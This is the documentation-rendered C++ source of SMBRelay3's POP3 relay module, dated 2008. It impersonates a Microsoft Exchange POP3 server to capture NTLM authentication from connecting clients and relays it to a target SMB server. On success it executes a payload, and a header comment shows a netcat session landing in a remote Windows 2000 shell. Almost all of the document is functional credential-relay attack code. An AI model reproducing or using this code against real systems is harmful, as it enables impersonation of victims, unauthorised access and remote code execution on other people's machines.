C:/Web/smbrelay3/src/pop3relay.cpp

Go to the documentation of this file.
00001 /*
00002     SMBRelay3 - POP3 REPLAY ATTACK MODULE
00003     -------------------------------------
00004 
00005 
00006 C:\smbrelay>nc 192.168.47.128 8080
00007 Microsoft Windows 2000 [Versión 5.00.2195]
00008 (C) Copyright 1985-2000 Microsoft Corp.
00009 
00010 C:\WINNT\system32>
00011 
00012 */
00013 
00014 
00015 #include "pop3relay.h"
00016 #include "payload.h"
00017 
00018 extern int verbose;
00019 
00020 int HandleIncommingPOP3Request(RELAY *relay, char *destinationhostname, int destinationport)
00021 {
00022         char buffer[4096];
00023         char buf[4096];
00024         char buf1[4096];
00025         char buf2[4096];
00026 
00027         char CurrentUserName[256];
00028         char CurrentDomain[256];
00029         char CurrentWorkstation[256];
00030         smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
00031     tSmbNtlmAuthRequest *request;
00032         
00033         uint16 packetlen;
00034         int i;
00035     char *p;
00036         const char WelcomeMessage[]= "+OK Microsoft Exchange Server 2003 POP3 server version 6.5.7226.0 (SmbRelay) ready\r\n";
00037     #define ERRORR "-ERR The specified authentication package is not supported.\r\n"
00038     #define CAPA "+OK Capability list follows\r\nAUTH NTLM\r\n+OK\r\n"
00039     #define AUTH "+OK The operation completed successfully.\r\nNTLM\r\n.\r\n"
00040     #define AUTHOK "+OK User successfully logged on.\r\n"
00041     #define AUTHERROR "-ERR Authentication Failed\r\n"
00042     
00043 
00044     printf("[+] Sending POP3 Banner\n");
00045     i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00046         if (i<=0){
00047                 printf("Error Reading EHLO message\n");
00048         return(0);
00049         }
00050     
00051 
00052     if (memcmp(buffer,"CAPA",4)==0) {
00053                 printf("[+] CAPA Requests\n");
00054         i=SendBytesAndWaitForResponse(relay->source,(char*)CAPA, strlen(CAPA), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00055         if (i<=0) return(0);
00056         buffer[i]='\0';
00057         }
00058     if (memcmp(buffer,"AUTH",4)!=0) {
00059                 printf("[-] AUTH NTLM packet not received from client\n");
00060         i=SendBytesAndWaitForResponse(relay->source,(char*)ERRORR, strlen(ERRORR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00061         return(0);
00062     } else {
00063         printf("[+] Sending AUTH NTLM option to the client\r\n");
00064         i=SendBytesAndWaitForResponse(relay->source,(char*)AUTH, strlen(AUTH), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00065         if (i<=0) return(0);
00066         buffer[i]='\0';
00067     }
00068 
00069     if (memcmp(buffer,"AUTH NTLM",9)!=0) {
00070         printf("[-] Not supported option %s received\n",buffer);
00071         return(0);
00072     }
00073     if (strlen(buffer)>12){
00074         printf("[+] received AUTH NTLM message\n");
00075         memset((char*)&buf1,'\0',sizeof(buf1));
00076             packetlen=from64tobits(buf1, buffer+12);
00077         request=(tSmbNtlmAuthRequest *)buf1;
00078         dumpAuthRequest(0,request);
00079     } else {
00080         memset(buffer,'\0',sizeof(buffer));
00081         i=SendBytesAndWaitForResponse(relay->source,(char*)"+ OK\r\n", 6, buffer,sizeof(buffer),SMBWAITTIMEOUT);
00082         if (i<=0){
00083                     printf("[-] Error Auth response with NTLM type1 packet\n");
00084             return(0);
00085             }
00086         buffer[i]='\0';
00087         printf("[+] received AUTH NTLM message\n");
00088         memset((char*)&buf1,'\0',sizeof(buf1));
00089             packetlen=from64tobits(buf1, buffer);        
00090         request=(tSmbNtlmAuthRequest *)buf1;
00091         
00092         if (debug) {
00093             printf("[+] received AUTH NTLM message: %s\n",buffer);
00094             DumpMem(buf1,packetlen);
00095             dumpAuthRequest(0,request);
00096         }
00097     }
00098     
00099 
00100         //Init Replay Attack
00101     i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
00102         if (!i) {
00103                 printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport); 
00104                 return(0);
00105         }
00106         printf("[+] Sending SMB Protocol Authentication Handshake\n");
00107     p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
00108     p = AddDialect(p,"LANMAN1.0", 0x02,&i);
00109     p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
00110     p = AddDialect(p,"LM1.2X002", 0x02,&i);
00111     p = AddDialect(p,"LANMAN2.1", 0x02,&i);
00112     p = AddDialect(p,"NT LM 0.12", 0x02,&i);
00113         NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
00114     free(p);
00115     i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00116     free(NegotiateProtocol);
00117         if (i<=0){
00118                 printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
00119         return(0);
00120         }
00121         
00122         SmbPacket1=BuildSmbPacket1();
00123         if (debug)  {
00124                 printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
00125                 DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
00126         }
00127 
00128         SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
00129         if  (SmbPacket2==NULL) {
00130                 printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
00131         return(0);
00132         }
00133         printf("[+] Received SMB Message with NTLM message type 2 packet\n");
00134         memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);
00135 
00136     if (debug) {
00137         printf("[*] SMB Packet Dump:\n");
00138         DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
00139         printf("[*] NTLM Challenge packet from SMB message\n");
00140         DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
00141         dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
00142     }
00143                 
00144     ((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
00145         memset(buf1,'\0',sizeof(buf1));
00146         to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
00147         sprintf(buf,"+ %s\r\n",buf1);
00148 
00149         printf("[+] Replaying NTLM Challenge from SMB Server to the POP3 Client\n");
00150         if (debug)
00151         {
00152                 printf("[+] Sending SMTP Response: %s\n",buf);
00153         }   
00154     i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
00155         if (i<=0)
00156         {
00157                 printf("[-] Unable to read NTLM packet 3 from POP3 client\n");
00158         return(0);
00159         }
00160     buffer[i]='\0';
00161 
00162     if (debug) printf("[*] Response: %s\n",buffer);
00163         memset((char*)&buf1,'\0',sizeof(buf1));
00164         packetlen=from64tobits(buf1, buffer);
00165     if (debug) {
00166         
00167                     printf("[*] Raw authorization packet (len: %i)\n",packetlen);
00168                     DumpMem(buf1,packetlen);
00169             dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);    
00170         }
00171 
00172     
00173         GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
00174         printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
00175         buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
00176     SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
00177     
00178 
00179         printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
00180         if (debug) 
00181         {
00182                 DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
00183         }
00184 
00185     i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00186         if (i<=0){
00187                 printf("[-] Error reading Server Authentication Response\n");
00188         i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00189         return(0);
00190         }
00191         if (debug)  {
00192                 printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
00193                 DumpMem(buf,i);
00194         }
00195 
00196         if (((smheader*)buf)->NtStatus!=0x00000000) {
00197                 printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
00198         i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00199         return(0);
00200         }
00201     if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
00202     {
00203          printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");
00204          i=SendBytesAndWaitForResponse(relay->source,AUTHERROR, strlen(AUTHERROR), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00205          
00206         return(0);
00207     }
00208                 
00209         //WriteDataToReportFile("log.txt", (tSmbNtlmAuthResponse*)buf1, destinationhostname,(unsigned char*)((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->challengeData);
00210         
00211         printf("[+] SessionSetupAndX Completed \n");
00212         printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName);
00213     i=SendBytesAndWaitForResponse(relay->source,AUTHOK, strlen(AUTHOK), buffer,sizeof(buffer),SMBWAITTIMEOUT);
00214         ExecuteCode( *relay);
00215 
00216     return(1);
00217 
00218 }
00219 
00220 

Generated on Wed Nov 12 22:04:28 2008 for Smbrelay version 3 by  doxygen 1.5.4